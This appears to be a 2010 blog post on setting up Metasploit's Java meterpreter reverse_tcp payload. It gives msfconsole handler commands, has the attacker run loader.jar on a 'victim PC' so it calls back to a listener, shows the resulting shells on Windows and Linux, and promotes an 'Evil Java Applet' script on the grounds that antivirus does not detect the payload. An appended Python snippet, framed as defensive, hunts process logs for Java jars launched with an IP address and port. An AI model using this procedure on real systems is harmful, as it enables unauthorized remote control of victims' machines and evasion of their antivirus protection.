Metasploit JAVA meterpreter payload

If you haven’t noticed, the Metasploit Framework has had a JAVA meterpreter payload for some time now.
It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.
It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Furthermore, I have recreated my “Evil java applet wizard” to automate the process of getting it up and running.
The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead of a binary executable.
Registered members can download the script at the end of this post (Script updated Aug 17).
Why use a java meterpreter, you ask?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"
You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual tweaking is no longer necessary: the Metasploit framework now has the java meterpreter listener built in.
That means you can skip steps 1 to 4 and, instead of using the patched php meterpreter, you can use the java meterpreter directly.
I have also updated the script to use the java payload as well.
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf exploit(handler) >
Let's see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate
2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip
3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter
4. Back up the PHP Meterpreter files and change the jar files' extensions to php (this will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
5. Launch msfconsole and set up a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole
__.                       .__.        .__. __.
_____   _____/  |______    ____________ |  |   ____ |__|/  |_
/     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
\/     \/          \/     \/ |__|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to the victim PC and run it as follows:
C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar   []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444
7. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010

meterpreter > sysinfo
Computer: exploit
OS      : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >
P.S.:
The java meterpreter will work on Linux systems as well…
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010

meterpreter > sysinfo
Computer: Blackbox
OS      : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >
I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).
2. It makes sense to use the Java Meterpreter payload if you are already using the JAVA Applet client side attack vector.
If it worked, it means that the victim has Java installed on his system, which allows us to use this payload.
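A defender's view of step 6 and the antivirus point above, as an added example that is not part of the original post: the payload is an ordinary jar started by the JRE, so process-creation logs are a better place to look than file signatures. The sketch flags Java launches whose jar receives an IP literal and a port as its first two arguments; the log records and host names are constructed, and the function names are hypothetical.

```python
import ipaddress
import shlex

# Constructed process-creation records (host, command line); not from the original post.
SAMPLE_EVENTS = [
    ("ws-01", r'java -jar loader.jar 192.168.1.104 4444'),
    ("ws-02", r'"C:\Program Files\Java\jre6\bin\javaw.exe" -jar "C:\Temp\update.jar" 10.0.0.5 8443'),
    ("ws-03", r'java -Xmx512m -jar build-tool.jar compile src'),
    ("ws-04", r'java -jar server.jar --port 8080'),
    ("ws-05", r'python loader.py 192.168.1.104 4444'),
]
JAVA_BINARIES = {"java", "java.exe", "javaw", "javaw.exe"}


def _basename(path):
    # Handle Windows and POSIX separators regardless of the analysis host.
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def jar_callback_args(cmdline):
    """Return (jar, ip, port) when a Java launcher runs a jar whose first two
    arguments are an IP literal and a valid TCP port, else None."""
    try:
        # posix=False keeps backslashes in Windows paths literal.
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes in the logged command line
        return None
    if not argv or _basename(argv[0]) not in JAVA_BINARIES or "-jar" not in argv:
        return None
    rest = argv[argv.index("-jar") + 1:]
    if len(rest) < 3:
        return None
    try:
        ip = ipaddress.ip_address(rest[1])
        port = int(rest[2])
    except ValueError:
        return None
    if not 1 <= port <= 65535:
        return None
    return _basename(rest[0]), str(ip), port


def hunt(events):
    """Return (host, jar, ip, port) for every record that matches the pattern."""
    found = ((host, jar_callback_args(cmd)) for host, cmd in events)
    return [(host, *match) for host, match in found if match]
```

Legitimate Java tools can also take an address and port on the command line, so hits are triage leads to correlate with outbound connections from the same `java` process, not verdicts.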
